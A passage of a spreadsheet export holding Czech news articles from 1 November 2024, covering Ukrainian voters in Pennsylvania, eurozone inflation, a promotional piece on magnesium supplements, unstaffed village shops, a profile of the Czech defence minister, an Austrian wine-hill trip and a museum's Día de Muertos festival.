Ukrajinu , Trumpa bych nikdy volit nemohla. Je to celý balík důvodů, jako třeba reprodukční práva,“ vysvětluje žena, která má stále část rodiny v Kyjevě . Ačkoliv bude volit Harrisovou, i její postoj k válce na Ukrajině se jí zdá slabý a ráda by, aby Washington dal Kyjevu svolení zasahovat americkými zbraněmi cíle hluboko v ruském vnitrozemí. „Říká, že Ukrajinu bude podporovat, dokud to bude třeba. Ale já bych ráda věděla, co přesně to znamená,“ říká na adresu Harrisové. S tím, jak se válka prodlužuje, slábne i tady ochota pomáhat Kyjevu tak jako dřív. Tím spíše, že hlavními tématy pro voliče v Pensylvánii jsou nyní jednoznačně inflace a ceny potravin a benzinu. „Většina lidí je tu přátelská a Ukrajince podporuje. Ale přesto vidím, že čím déle válka trvá, tím více jsou Američané problémy Ukrajiny unaveni. Někteří lidé dávají na humanitární pomoc, ale podpora je znatelně nižší a pomalejší,“ pozoruje Serhij Pantoněnko, sám v triku s logem jedné z charitativních sbírek. I on patří k menšině Ukrajinců v Pensylvánii , kteří sem přišli až po ruské invazi. Podobně jako Darja utíkal přes Krym , když Rusové povolili evakuaci obyvatel skrze filtrační tábory pod kontrolou tajné služby FSB. Ukrajinští muži v odvodovém věku jsou nyní ve své vlasti pod sílícím tlakem úřadů, aby se vrátili. Serhij, který v Erie pracuje jako dělník, se však na Ukrajinu hodlá vrátit, teprve až válka skončí. V USA trvale zůstat nechce, stejně jako Darja, která se tu živí jako manikérka. V kavárně Bakery on 5th, kde se potkáváme, prý také pracuje několik Ukrajinců, čemuž odpovídá i neobvyklá nabídka pelmeňů v jinak typickém místním menu. Pokud ale existuje něco jako centrum ukrajinské komunity v Erie , jsou to kostely. Paradoxně k nim patří i ruský ortodoxní kostel Narození Páně, který už přes sto let stojí u Erijského jezera, kde ho vybudovali tehdejší emigranti z řad starověrců z carského Ruska . „Nejsou na straně ruské vlády, snaží se vystupovat nezávisle. Kněz, který to vede, je dokonce velmi proukrajinský. Ale musejí se řídit i moskevským patriarchátem,“ líčí komplikovanou pozici místních Surzhková Harnedová. Většina lidí v Pensylvánii , kteří mají ukrajinské kořeny, tu přitom žila dávno před ruskou invazí. Ukrajinská emigrantská skupina byla v tomto státě silná už v dobách Sovětského svazu . V 60. letech tu dokonce působil jeden z nejlepších fotbalových týmů v USA své doby s výmluvným názvem Philadelphia Ukrainian Nationals. Zřejmě i kvůli silnějšímu zastoupení voličů s východoevropskými kořeny je dnes Pensylvánie celkově – včetně politiků z řad demokratů i republikánů – Kyjevu nakloněna asi více, než je americký průměr. Pensylvánie tak byla úplně prvním americkým státem, který na Rusko po začátku invaze uvalil vlastní sankce. Státem vlastněné obchody s alkoholem dokonce vyřadily z pultů ruskou vodku, podotkl nedávno list The Washingon Post. Jisté je, že zdejší výsledek voleb ovlivní další dění na Ukrajině zásadně. Zda může válka daleko v Evropě také nějak ovlivnit výsledek amerických voleb, jak doufají místní Ukrajinci, to se ukáže během několika dní. Američané jsou problémy Ukrajiny unaveni, říká Serhij Pantoněnko, který prchl do USA po ruské invazi. Dole zleva starobylá ruská čtvrť v Erie a místní volič Donalda Trumpa . Foto Martin Dohnal Hlavními tématy pro voliče v Pensylvánii jsou jednoznačně infl ace a ceny potravin a benzinu Autor: Martin Dohnal, zvláštní zpravodaj Práva v USA Autor Martin Dohnal Rubrika transition_slide ZE ZAHRANIČÍ AMERICKÉ VOLBY 2024</t>
  </si>
  <si>
    <t>140000</t>
  </si>
  <si>
    <t>20241101_596_3241253647_1ad4b69aead9c0eac091.html</t>
  </si>
  <si>
    <t>1ad4b69aead9c0eac091</t>
  </si>
  <si>
    <t>• Inflace v eurozóně mírně zrychlila</t>
  </si>
  <si>
    <t>• Inflace v eurozóně mírně zrychlila Meziroční tempo růstu spotřebitelských cen v eurozóně v říjnu zrychlilo na dvě procenta ze zářijových 1,7 procenta. Uvedl to ve svém odhadu Eurostat. Ceny ve službách stouply o 3,9 procenta, zatímco potraviny, alkohol a tabák zdražily o 2,9 procenta. Ceny průmyslového zboží se zvýšily o 0,5 procenta, ceny energií naopak o 4,6 procenta klesly.</t>
  </si>
  <si>
    <t>20241101_597_3240092877_642c59a252b5e9586e87.html</t>
  </si>
  <si>
    <t>642c59a252b5e9586e87</t>
  </si>
  <si>
    <t>Minerál, bez kterého se zkrátka neobejdeme. Vedle lepšího spánku a vyšší výkonnosti, snižuje hořčík i riziko některých onemocnění Praha 1. listopadu 2024 Není hořčík jako hořčík! Známe ho jako pomocníka při křečích, svalové únavě nebo pro lepší spánek. Věděli jste ale, že existuje hned několik jeho forem, z nichž každá řeší různé potřeby našeho těla? Magnesium bisglycinát je ideální pro regeneraci a snížení stresu, malát člověku pomáhá efektivně využívat energii a threonát zase stimuluje mysl. Je proto důležité nejen vybrat jeho správný druh, ale také vědět, kdy je vhodná denní doba jej užívat. Přestože je magnesium skutečně důležitým minerálem, které tělo potřebuje nejen pro svou regeneraci, ale také například pro správnou funkci nervového, metabolického a kardiovaskulárního systému, jako společnost jej přijímáme v kriticky malém množství. U zdravého dospělého člověka by se jeho optimální hladina měla pohybovat v rozmezí 0,75 – 0,95 miligramů na litr (mmol/l). Lidé se však k těmto hodnotám často ani nepřibližují a jejich hořčík rozpuštěný v krvi sotva dosahuje dolní hranice ideálního rozmezí. Studie ukazují, že nedostatečné zastoupení magnezia v těle člověka souvisí s celou řadou zdravotních komplikací, jako jsou křeče, migrény, únava nebo také problémy spojené s krevním tlakem. Pro opětovné doplnění potřebných zásob však nestačí v lékárně popadnout první krabičku s tabletkami, která nám padne do rukou. Je potřeba číst i zadní stranu přípravku, která nám prozradí, o jaký konkrétní druh se jedná. Jde totiž o minerál, jež lze užívat v různých formách, které cílí na různé aspekty zdraví a správné činnosti našeho těla. Svou roli v rámci vstřebávání a celkové reakce organismu na tento prvek navíc hraje také lidská individualita a genetická předurčenost. Jak se tedy jednoduše v magnesiu vyznat? Záleží na čase i primárním důvodu suplementace Jak již bylo zmíněno forem hořčíku existuje hned několik – každý s trochu jiným výsledným efektem. Nejde tedy obecně vyzdvihnout pouze jeden nejlepší a nejúčinnější typ. „Jednotlivé druhy hořčíku mají různou biologickou dostupnost a účinnost. Magnesium bisglycinát (či glycinát) je velmi dobře vstřebatelný, jemný na žaludek a efektivně uklidňuje tělo i mysl. Hodí se tedy pro podporu kvalitního spánku a snížení stresu. Naopak Magnesium malát dodává tělu energii a snižuje nežádoucí únavu. Magnesium taurinát je prospěšný pro zdraví srdce a cév, zatímco magnesium citrát a oxid léčí zácpu a pálení žáhy. Velmi důležitý je také magnesium threonát, jenž proniká do mozku, kde zesiluje pozornost a kognitivní funkce člověka. Je třeba zmínit, že existují také přípravky, které mohou obsahovat více než jen jeden druh. Pro zvýšení užitku jsou navíc častokrát doplněny také o další vitamíny a minerály. Není tedy pravidlem, že jednotlivé formy magnesia jde užívat pouze odděleně,“ vysvětluje jednotlivé formy hořčíku Ing. et Ing. Barbora Procházková , Ph.D., jež se mimo jiné podílí také na vývoji genetických testů a testování střevního mikrobiomu ve společnosti Chromozoom. Vždy tedy záleží, co chceme hořčíkem řešit. Potřebujeme podpořit celodenní energii a soustředění na práci? Či se naopak potýkáme se špatným spánkem a dlouhým procesem usínání? Od důvodu suplementace se poté odvíjí i doba užívání. Magnesium bisglycinát je vhodné přijímat v odpoledních hodinách, večer před spaním nebo také hned po tréninku, jelikož uvolňuje svaly, podporuje jejich regeneraci a zklidňuje nervový systém v těle. Spánek je proto daleko hlubší a kvalitnější. Naopak magnesium malát bychom měli doplnit hned ráno či krátce před cvičením. Pro své energizující účinky je vhodný například pro jedince trpící chronickou únavou. Raději přírodní a nikdy ne nalačno! Zamyslet bychom se měli také nad chemickou formou suplementovaného magnesia. Organický hořčík, jako je například citrát či glycinát, na sebe naváže přírodní látky v podobě aminokyselin nebo kyselin, které jsou ze své podstaty tělu bližší. Proto je i jejich výsledná vstřebatelnost daleko vyšší, než je tomu u anorganických forem, které mnohdy stojí jen pár korun a dají se sehnat takřka všude. Člověk si ale z umělého hořčíku, do které řadíme třeba magnesium oxid či síran, kvůli anorganickým sloučeninám vezme jen velmi malé množství aktivních látek. Je proto více než důležité zaměřit se hlavně na organické formy, které jsou sice dražší, pro lidské zdraví však mnohem přínosnější. Pozor ale! Hořčík bychom nikdy neměli suplementovat na prázdný žaludek. Vedle nižší vstřebatelnosti by nás totiž mohly potkat i nepříjemné zažívací problémy. Magnesium tedy vždy společně s jídlem. Abychom z přijímaného hořčíku vytěžili co možná nejvíc, hodí se jej doplňovat s určitými vitamíny, které jeho účinky maximalizují. „Pro lepší absorpci je užitečný vitamin D. V Chromozoom nabízíme doplněk stravy SUPERMg, který vedle šesti chelátových forem hořčíku obsahuje právě také D3 pro maximalizaci vstřebatelnosti a podpoře celkového účinku. Suplementace magnesia společně s vitamínem B6 zase zvyšuje a podporuje využití v těle, což je přínosné například pro snížení stresu. Je potřeba myslet také na vzájemnou rovnováhu s vápníkem, který podporuje svalovou kontrakci. Aby tedy nedocházelo ke svalovým křečím, vysokému tlaku a zvýšenému riziku srdečních chorob, je potřeba hořčík doplňovat v dostatečném množství v závislosti na hladinách vápníku v těle. Naopak s čím by se hořčík kombinovat určitě neměl je zinek a železo. Ty totiž snižují jeho vstřebatelnost v těle,“ komentuje Procházková . Důležité je to nepřehánět Ačkoliv se jedná o skutečně nepostradatelný minerál pro optimální funkci lidského organismu, některé jeho formy jsou více dráždivé než jiné. Jde především o magnesium citrát a oxid, které jsou při nevhodném dávkování velmi projímavé. Vedle nepříjemného průjmu se člověk může potýkat také s nevolností a křečemi do břicha. Těžší symptomy poté mohou zahrnovat i zmatení, ospalost, nízký krevní tlak, svalovou slabost či dokonce arytmii srdce. Přestože je předávkování hořčíkem velmi ojedinělé, určitě není nemožné. Genetička Procházková dodává, že ve vzácných případech může nadměrný příjem vést až k hypermagnezémii, tedy vysoké hladině hořčíku v krvi: „Obecně se uvádí, že hypermagnezémie může nastat při dávkách kolem 5000 mg (5 g). U lidí s ledvinovým onemocněním může problém nastat i nižší dávka, například 1000–2000 mg denně. Výsledkem jsou dýchací potíže, nepravidelný srdeční rytmus či srdeční zástava, která postihuje především lidi s poruchami ledvin.“ Je proto více než důležité dodržovat doporučený denní příjem. A kolik hořčíku naše tělo potřebuje? Optimální množství pro muže se pohybuje okolo 400–420 mg. Zdravá dospělá žena by měla přijímat zase 310–320 mg. U kojících a těhotných se poté dávka lehce navyšuje. Je důležité ale přihlédnout k aktuální hmotnosti, od které se poté přesná hodnota vypočítá. Orientačně se uvádí, že denní potřeba hořčíku je 6 mg na kilogram naší váhy. Člověk vážící 70 kg by tedy každý den měl přijmout 420 mg. Genetická rezistence, či určitý druh intolerance? Výsledný efekt magnezia se u každého z nás může projevovat jinak. Nadměrný příjem soli, chronický stres, příliš kofeinu v těle, kouření a alkohol . Pokud náš životní styl formují především tyto zlozvyky, může docházet ke snížení pozitivního dopadu pravidelné suplementace. Všechny tyto faktory mají totiž velmi negativní dopad na vstřebatelnost hořčíku v těle. Někteří z nás dokonce mohou trpět určitou formou intolerance na některé tipy magnesia. „Pro lidi s citlivým trávicím traktem může být magnesium citrát velmi problematický a příliš agresivní. V těchto případech se proto hodí tento typ vyměnit za jemnější variantu,“ dodává Procházková . Ani DNA a dědičné predispozice však není dobré přehlížet. Některé varianty genů, například TRPM6, mají značný vliv na koordinaci příjmu tohoto minerálu v ledvinách a střevech. Pokud naše genetická výbava obsahuje určité formy mutace, může dojít ke snížené schopnosti vstřebávání hořčíku, která je častou příčinou již zmiňované hypermagnezémie. Dalším genem, který řídí hladinu hořčíku v těle, je CNNM2. V lepším případě mohou některé jeho polymorfismy vést ke zlepšení vstřebatelnosti, na druhou stranu však jiné mutace tohoto genu zvyšují riziko nedostatku či dokonce úplné ztráty hořčíku. Pro snížení fyzických i duševních onemocnění Pravidelná suplementace nepřináší ovoce nejen z krátkodobého hlediska v pohodě kvalitního spánku či zvýšené energie během sportovním výkonu. Účinný je také při léčbě závažných chorob. Magnesium do značné míry snižuje příznaky ale i samotná rizika projevu určitých genetických onemocnění. Hraje totiž významnou roli ve stovkách biochemických procesů, včetně regulace genové exprese. Například u lidí s předpoklady k srdečním problémům napomáhá pravidelný příjem hořčíku koordinovat krevní tlak a udržovat správný tlukot srdce. Obecně je také velmi užitečný v rámci kontroly krevního cukru a zlepšuje citlivost organismu na inzulín. „Pravidelná suplementace hořčíku může zlepšit metabolismus glukózy a snížit riziko komplikací spojených s vysokou hladinou krevního cukru, což může být obzvláště přínosné pro jedince se zvýšeným genetickým rizikem cukrovky,“ vysvětluje genetička. Pozitivní dopad magnezia se projevuje také na naší náladě. Tento minerál totiž mimo jiné zajišťuje také regulaci neurotransmiterů, jako jsou serotonin, glutamát a GABA, které ovlivňují nejen nervový systém, ale také naši emocionální rovnováhu. Pravidelný příjem hořčíku se tedy projevuje i na mentálním nastavení a celkovém rozpoložení. Jednoduchý průvodce těmi nejdůležitějšími druhy hořčíku BISGLYCINÁT Výhody: skvěle vstřebatelný, jemný na žaludek, uklidňuje mysl i tělo, uvolňuje svaly Důvod užívání: zlepšení kvality spánku, regenerace po tréninku, relaxace a snížení stresu Vhodná denní doba: odpoledne, večer, hned po fyzické aktivitě MALÁT Výhody: skvěle vstřebatelný, pomáhá vytvářet a efektivně zpracovávat energii Důvod užívání: dodání energie, regulace chronické únavy Vhodná denní doba: ráno po probuzení, dopoledne THREONÁT Výhody: skvěle vstřebatelný, podporuje správnou mozkovou aktivitu a zesiluje kognitivní funkce Důvod užívání: snížení stresu a úzkosti, jasnější mysl, zlepšení soustředění a učení Vhodná denní doba: dopoledne Autor: Svetozár Plesník Autor person Svetozár Plesník Rubrika transition_slide Zdraví</t>
  </si>
  <si>
    <t>20241101_598_3241305161_2942afda1a88e006a133.html</t>
  </si>
  <si>
    <t>2942afda1a88e006a133</t>
  </si>
  <si>
    <t>• Mladiství pod vlivem alkoholu</t>
  </si>
  <si>
    <t>• Mladiství pod vlivem alkoholu Pětadvacet mladistvých pod vlivem alkoholu přistihli pražští policisté při třídenní akci zaměřené na dodržování veřejného pořádku. Prověřili dvě stovky restaurací, barů, heren a squatů, někteří mladiství nadýchali alkohol i při kontrole ve venkovním prostředí. Při akci policisté odhalili také řidiče se zákazem řízení a jednou trestný čin ohrožování výchovy dítěte, uvedl mluvčí pražské policie Jan Rybanský. Autor: (ČTK, zr) Autoři ČTK person zr</t>
  </si>
  <si>
    <t>37000</t>
  </si>
  <si>
    <t>20241101_599_3241379128_0f3cd1ab0cf403e49b18.html</t>
  </si>
  <si>
    <t>0f3cd1ab0cf403e49b18</t>
  </si>
  <si>
    <t>Prodejen bez obsluhy přibývá</t>
  </si>
  <si>
    <t>Prodejen bez obsluhy přibývá Velký zájem projevují obce na jihu Čech o samoobslužné prodejny, které fungují v režimu 24 hodin denně a sedm dní v týdnu. Jen na Strakonicku jsou v současné době tři a další tři by chtělo spotřební družstvo Jednota ve Volyni otevřít už v příštím roce. „Reagujeme tím na poptávku zákazníků, tak i na požadavky obcí, jejichž starostky a starostové spatřují v této službě posílení obslužnosti venkovského prostoru,“ sdělil Právu Radek Kurc, vedoucí obchodně-provozního odboru Jednot y Volyně . Volyňská Jednota byla první v České republice , která se k tomuto kroku odhodlala. První nonstop otevřená prodejna byla ve Strakonicích . Nyní Jednot a, spotřební družstvo ve Volyn i, provozuje 42 obchodů. Ten největší je ve Strakonicích , nejmenší ve Lhotě Střelskohoštické. Tři prodejny jsou otevřené nonstop, již zmíněná strakonická prodejna v Podskalské ulici, dále v Radomyšli a v Malenicích. Tržby v bezobslužném provozu se pohybují okolo dvanácti pro cent z celkového obratu prodejny. Zákazníci chodí nejvíce nakupovat v pátek či v sobotu. „Nejpozději v roce 2025 chceme do provozu nonstop převé st další tři prodejny,“ řekl Kurc. Prodejny hlídají strážci, ale i umělá inteligenc e a problémů je minimálně. V době, kdy by byla Jednota standardně zavřená, chodí nakupovat stovky lidí měsíčně. „Jde o úspěšný projekt. Dokázali jsme uspokojit zákazníky, kteří nemají z různých důvodů možnost dojít na nákup během běžné prodejní doby,“ je přesvědčený Kurc. Nejúspěšnější a nejnavštěvovanější je v tomto ohledu malenická prodejna, která byla v spuštěna v květnu 2024. „Naši obyvatelé tuto službu oceňují. Když něco zapomenet e, díky této službě můžete hned všechno napravit. Často vídám, že u Jednoty zaparkuje auto za tmy,“ pochvaluje si starosta Malenic Jiří Mráz (Občané pro Malenice). V nabídce automatické prodejny je veškerý sortiment, nejsou jen krájené uzeniny a vážené zboží z pultu. Lidé kupují sladké a energetické nápoje, běžné pochutiny, mléčné výrobky, alkohol i nebalené pekařské výrobky a pečivo, na které poskytujeme v automatickém provozu slevu od 20 procent. „Výhodou prodejen 24/7 je, že nevyžadují příliš velké zásahy do stavebních úprav,“ doplnil Kurc. Když něco zapomenete, díky této službě můžete hned všechno napravit Radek Kurc, Jednota Volyně Daniel Havlík z Krušlova vyrazil v noci do malenické prodejny COOP pro droždí. Foto Pavel Pechoušek Autor: Pavel Orholz Autor Pavel Orholz</t>
  </si>
  <si>
    <t>20241101_6_3264632727_fb0bf367f53cee97cce9.html</t>
  </si>
  <si>
    <t>fb0bf367f53cee97cce9</t>
  </si>
  <si>
    <t>Za jízdu pod vlivem až pět let. Japonsko vytáhlo do boje s nebezpečnými cyklisty Pokutu až 152 tisíc korun či dokonce pětiletý trest vězení mohou v Japonsku nově dostat cyklisté, kteří budou při jízdě používat mobilní telefon nebo pojedou pod vlivem alkoholu a způsobí nehodu. Nový zákon vešel v platnost v pátek a už má první uplatnění.</t>
  </si>
  <si>
    <t>20241101_60_3265236828_9a269ef72eed986b16ee.html</t>
  </si>
  <si>
    <t>9a269ef72eed986b16ee</t>
  </si>
  <si>
    <t>Vláda České republiky</t>
  </si>
  <si>
    <t>Vláda České republiky Jana Černochová ministryně obrany Jana Černochová se narodila v Praze . V roce 1996 absolvovala kurz celoživotního vzdělávání a složila závěrečnou zkoušku z oboru Bankovnictví a peněžní ekonomie na Fakultě financí a účetnictví Vysoké školy ekonomické v Praze . V roce 2009 dokončila bakalářské studium práv na Vysoké škole aplikovaného práva v Praze a v roce 2011 získala vysokoškolské vzdělání v magisterském studijním programu Mezinárodní teritoriální studia ve studijním oboru Mezinárodní vztahy a evropská studia na Metropolitní univerzitě v Praze . Před vstupem do politiky pracovala v bankovnictví. V roce 1998 byla zvolena do Zastupitelstva MČ Praha 2 a stala se místostarostkou. Od roku 2006 je zde pak (s dvouletou přestávkou) starostkou. V radě této městské části měla ve své gesci v různých obdobích oblasti financí, majetku, krizového řízení, bezpečnosti, kultury, školství a další. V rámci svého působení ve vedení MČ Praha 2 klade zvláštní důraz na připomínání historie, významných míst a osobností s Prahou 2 spojených. Spolupracuje s Československou obcí legionářskou, Židovskou obcí a dalšími spolky a paměťovými organizacemi na projektech připomínajících hrdiny obou světových válek a protikomunistického odboje. Byla iniciátorkou pravidelné organizace oslav Dne válečných veteránů na náměstí Míru v Praze , které se letos konaly již posedmé. Od roku 2010 dosud je poslankyní Parlamentu ČR, kde se věnuje oblastem obrany, bezpečnosti a zahraničních věcí. V letech 2017-2021 byla předsedkyní výboru pro obranu. Pracovala rovněž jako předsedkyně podvýboru pro válečné veterány. V rámci poslanecké práce se věnuje aktivitám zaměřeným na posilování obranyschopnosti České republiky , modernizaci armády a zajištění kvalitních podmínek služby vojáků z povolání, vojáků v aktivní záloze, válečných veteránů a příslušníků bezpečnostních sborů. Podílela se aktivně na tvorbě poslední významné novelizace branné legislativy, zejména na novele zákona o vojácích z povolání a na novém zákonu o službě vojáků v záloze. Prosazuje zavedení systémových změn za účelem posílení připravenosti obyvatel na krizové situace a aktuální bezpečnostní hrozby. Je podporovatelkou aktivní zálohy a jejího rozvoje. Zasazuje se také o zachování práv legálních držitelů zbraní navzdory snahám o jejich nepřiměřenou regulaci. V oblasti zahraničně-politické se věnuje zejména rozvoji vztahů mezi Českou republikou a Státem Izrael , byla navrhovatelkou řady usnesení PS PČR na podporu tohoto významného blízkovýchodního partnera a je dlouholetou členkou příslušné meziparlamentní skupiny přátel. Patří k zastáncům silné transatlantické vazby a rozvoje vztahů v rámci V4 s cílem prosazování společných zájmů v Evropské unii . Od roku 2020 je členkou Správní rady Univerzity Karlovy. Je držitelkou zbrojního průkazu a osvědčení fyzické osoby pro stupeň utajení „tajné“ (dle zákona č. 412/2005 Sb., o ochraně utajovaných informací a o bezpečnostní způsobilosti) a certifikátu NATO SECRET. Domluví se polsky, rusky a anglicky. Ve volném čase se věnuje potápění, sportovní střelbě, vojenské a historické literatuře a filmu a ráda vaří i jí a pije dobrá suchá vína . Od roku 1997 je členkou Občanské demokratické strany . Osobní údaje Mgr. Jana Černochová, narozena 26. října 1973 Vzdělání 2009–2011: Metropolitní univerzita v Praze, Mezinárodní vztahy a evropská studia (magisterské studium) 2007–2009: Vysoká škola aplikovaného práva v Praze , Právo v podnikání (bakalářské studium) 1996: Vysoká škola ekonomická v Praze , Fakulta financí a účetnictví, kurz celoživotního vzdělávání v oboru Bankovnictví a peněžní ekonomie Profesní a veřejná činnost 1998–2006: Městská část Praha 2 , místostarostka od 2006: Městská část Praha 2 , starostka od 2010: Poslanecká sněmovna Parlamentu ČR, poslankyně 2017–2021: Poslanecká sněmovna Parlamentu ČR, předsedkyně výboru pro obranu Sdílet článek</t>
  </si>
  <si>
    <t>7880</t>
  </si>
  <si>
    <t>8180</t>
  </si>
  <si>
    <t>20241101_600_3240071827_ce25c1f7073bf22f03cb.html</t>
  </si>
  <si>
    <t>ce25c1f7073bf22f03cb</t>
  </si>
  <si>
    <t>Podzimní výlet na Galgenberg: Virtuální procházka po kouzelném rakouském vinném kopci</t>
  </si>
  <si>
    <t>Podzimní výlet na Galgenberg: Virtuální procházka po kouzelném rakouském vinném kopci Aktuality Cestopisy Cestování karavanem Novinky Rakousko Zajímavosti Milujete víno a chtěli byste si dopřát opravdu to nejlepší v podstatě za humny? Pak samozřejmě můžete zamířit na jižní Moravu . Můžete si být jistí, že v oblastech okolo Znojma , Mikulova , Lednice a jiných dalších měst najdete to pravé, co byste si opravdu přáli. Možná se ale řadíte mezi lidi, kteří mají raději více soukromí a nikoli plné sklípky a spousty lidí, jste na správné adrese. My jsme se totiž vydali do Rakouska na slavný kopec Galgenberg, který nabízí jednak skvělé víno a jednak také soukromí. Vyrazili jsme z Nového Přerova Tato malinkatá obec nacházející se v podstatě na hranicích s Rakouskem . Ubytovali jsme se v Jáňově dvoře, a to v kempu. Cestovali jsme malou obytnou dodávkou a zázemí tady bylo optimální. Mají ale i pokoje, takže není problém. Pokojíků je tady více třeba i v ubytování Pod sklepy. Alternativ je zkrátka spousta. Nový Přerov je skvělým výchozím bodem i pro cyklisty, vede tudy slavná moravská cyklostezka. Dostanete se takřka kamkoli. Směrová tabule u hraničního přechodu: Foto Radek Štěpán Pohodová šestikilometrová vycházka Přesně tak. Vyrazili jsme z Nového Přerova a prakticky po kilometru jsme se dostali ke státní hranici s Rakouskem . Po cestě jsme nepotkali skoro nikoho. Ve stejném duchu se nesl i zbytek naší procházky. Šli jsme v podstatě po asfaltové cestě podél pole, které bylo většinou pooráno, nicméně po okrajích rostl kopr. V podstatě nikde volně jsem neviděl tak velké rostliny. V dálce se nám přibližoval Galgenberg a po obejití pole, na kterém byly zbytky pro Halloween tolik příznačných dýní, jsme se dostali ke vstupní bráně na zmíněný vinařská kopec. Volně u pole rostoucí kopr: Foto Radek Štěpán Spousta zavřených sklepů Barevné listy vinné révy nádherně korespondovaly s vinnými sklípky, jichž je na Šibeničním vrchu, jak se překládá slovo Galgenberg do češtiny, spousta. My jsme se vydali uličkami jen tak se toulat a kochat se. Na vrcholu kopce byl patrný kostelík s poměrně solidní skluzavkou dolů. Tu jsme nevyzkoušeli, ale našli jsme proslulý samoobslužný vinný sklípek. Zavřené sklepy na šibeničním vrchu: Foto Radek Štěpán Posezení u samoobslužného sklípku: Foto Radek Štěpán Degustace vína : Foto Radek Štěpán Samoobslužný vinný sklípek stál za to Dlouho jsme ho nemohli najít, jelikož jsme se vydali opačným směrem. Nakonec nás ale žluté stopy na chodníku dovedli jak ke sklípku, tak i k veřejným toaletám, které jsou u sklípku k dispozici zdarma. Sklípek je opravdu malebný jak zvenku, tak i zevnitř. Našli jsme tady dvě prosklené lednice plné vína , k dispozici byla i voda za jedno Euro. Za sedmičku vína chtěli kolem 7 eur. Peníze se vkládaly do pokladničky na stole. K dispozici byly i skleněné číše. My jsme si koupili jednu lahev ryzlinku a posadili se na krásné posezení vedle sklípku. Kromě dvou rakouských důchodců na kolech a jedné výpravy s průvodcem jsme nepotkali nikoho a seděli sami. Prostě dokonalá podzimní pohoda. Na video se ostatně můžete podívat sami Zdroje info: Autor Samoobslužný sklípek a žluté stopy: Náhledové foto Radek Štěpán Autor: Radek Štěpán Autor person Radek Štěpán Rubrika transition_slide Aktuality</t>
  </si>
  <si>
    <t>35190</t>
  </si>
  <si>
    <t>26260</t>
  </si>
  <si>
    <t>20241101_601_3244079191_8a7c0f8bd575f94d51f7.html</t>
  </si>
  <si>
    <t>8a7c0f8bd575f94d51f7</t>
  </si>
  <si>
    <t>Día de Muertos v Náprstkově muzeu na Betlémském náměstí Národní muzeum Národní muzeum v Praze (zkratka NM, od roku 1848 České muzeum , v letech 1854–1919 Museum Království českého) je nejvýznamnější česká muzejní instituce. Bylo založeno v roce 1818 jako Vlastenské muzeum za vlády Františka I. ze soukromých sbírek tehdejší české šlechty. Poslední významná rekonstrukce byla dokončena v říjnu 2018, na sté výročí vzniku Československa . Tisková zpráva Oblíbený mexický festival Día de Muertos (Den mrtvých) se po roce vrací do Náprstkova muzea asijských, afrických a amerických kultur Národního muzea . V sobotu 2. a v neděli 3. listopadu zaplní nádvoří Náprstkova muzea oslavy jednoho z nejdůležitějších svátků, které jsou zapsány na seznamu nehmotného kulturního dědictví UNESCO. Festival, organizovaný ve spolupráci s mexickým kolektivem Día de Muertos a dalšími partnery, přináší do Prahy jedinečnou atmosféru, během které mají návštěvníci příležitost ponořit se do bohaté mexické kultury a tradic. Día de Muertos čili Den mrtvých je v Mexiku jedním z nejdůležitějších svátků doprovázený bujarými oslavami, který vzdává hold předkům a jejich duším. Letošní ročník nabídne pestrý program, který oslavuje hluboké kořeny mexické komunity, a zároveň posiluje kulturní vazby mezi Mexikem a Českou republikou . Návštěvníci se mohou těšit na: Tradiční oltáře (Ofrendas): bohatě zdobené oltáře na počest zesnulých Dílny a rodinné aktivity: zdobení masek, Wixarika korálkové umění, tvoření papel picado a malování na obličej Živá vystoupení: Mariachi hudba, tradiční tance od Mestizo Ballet z Londýna , regionální mexická hudba od Tonalli z Vídně a další Soutěž o nejlepší Catrinu: přijďte oblečeni jako Catrina a soutěžte o výhru Piñatu pro děti: neděle plná zábavy s piñatami pro nejmenší návštěvníky Mexické řemeslníky: ručně vyráběné zboží a tradiční výrobky První den festivalu zakončí veselý fantaskní průvod masek, který se vydá z Betlémského náměstí centrem Prahy až na Staroměstské náměstí , a oslaví život, smrt a ducha komunity. Na akci je vstup zdarma. Program probíhá po celý víkend od 10.00 do 21.30 hodin. Více informací a program naleznete na www.diademuertos.cz. Zdroj: www.nm.cz Další články Další články od Národní muzeum Día de Muertos v Náprstkově muzeu na Betlémském náměstí Oblíbený mexický festival Día de Muertos (Den mrtvých) se po roce vrací do Náprstkova muzea asijských, afrických a amerických kultur Národního muzea . V sobotu 2. a v neděli 3. listopadu zaplní nádvoří Náprstkova muzea oslavy jednoho z nejdůležitějších svátků, které jsou zapsány na seznamu nehmotného kulturního dědictví UNESCO. 1. listopad 2024 | Národní muzeum Národní muzeum zrestauruje historickou pamětní desku Joachima Barranda na Barrandovských skalách Národní muzeum zahájilo restaurování historické litinové pamětní desky s nápisem BARRANDE na Barrandovských skalách. Ta je v současnosti již ve špatném stavu a cílem restaurátorských prací je obnovit a zachovat tuto památku na významného vědce pro budoucí generace. Z tohoto důvodu byla deska dne 25. listopadu 2024 ze skal sejmuta. Symbolický pomník výjimečnému badateli na poli paleontologie v Českých zemích zdobí Barrandovské skály na levém břehu Vltavy už od roku 1884. 25. říjen 2024 | Národní muzeum Výstavou Olympijské příběhy připomene Národní muzeum úspěchy českých sportovců za posledních více než 100 let Národní muzeum otevírá dnes, 16. října v Nové budově výstavu s názvem Olympijské příběhy. Ta mapuje úspěchy českých sportovců od jejich účasti na olympijských hrách v Londýně v roce 1908 až po letošní olympiádu v Paříži . Návštěvníci se mohou těšit na mnohdy nikdy nevystavené předměty ze sportovních sbírek Národního muzea či unikátní zápůjčky. Výstavu připravilo Národní muzeum ve spolupráci s Českým olympijským výborem. 16. říjen 2024 | Národní muzeum Nejkrásnější české knihy roku 2023 budou vystaveny v Národním muzeu Syrově uhrančiví Muklové a šlajsny, ilustrovaná historie ragby, Štěpánka Haničincová a Čertík Bertík ve mnohakilové knize o loutkovém filmu, vysoká kniha o lese a miniaturní Jack London , rozverný houbový věstník nebo fotografická autorská kniha z freetechno scény – to je pouze pár příkladů knižních děl, které lze vidět na výstavě nejkrásnějších knih loňského roku. 7. říjen 2024 | Národní muzeum Národní muzeum otevírá novou výstavu Etiopie objektivem diplomata v Náprstkově muzeu Na nádvoří Náprstkova muzea asijských, afrických a amerických kultur si mohou návštěvníci nově prohlédnout výstavu s názvem Etiopie objektivem diplomata. Výběr fotografií, jejichž autorem je Miroslav Kosek, představuje přírodní krásy a geografickou rozmanitost Etiopie i každodenní život jejích obyvatel. 30. srpen 2024 | Národní muzeum Národní muzeum na příští rok připravuje dvě světové výstavy – Čingischán a 100 předmětů, 100 příběhů z Národního palácového muzea na Taiwanu . Smlouvy jsou podepsány! Národní muzeum připravuje na příští rok dvě velké výstavy světového významu. Ve spolupráci se 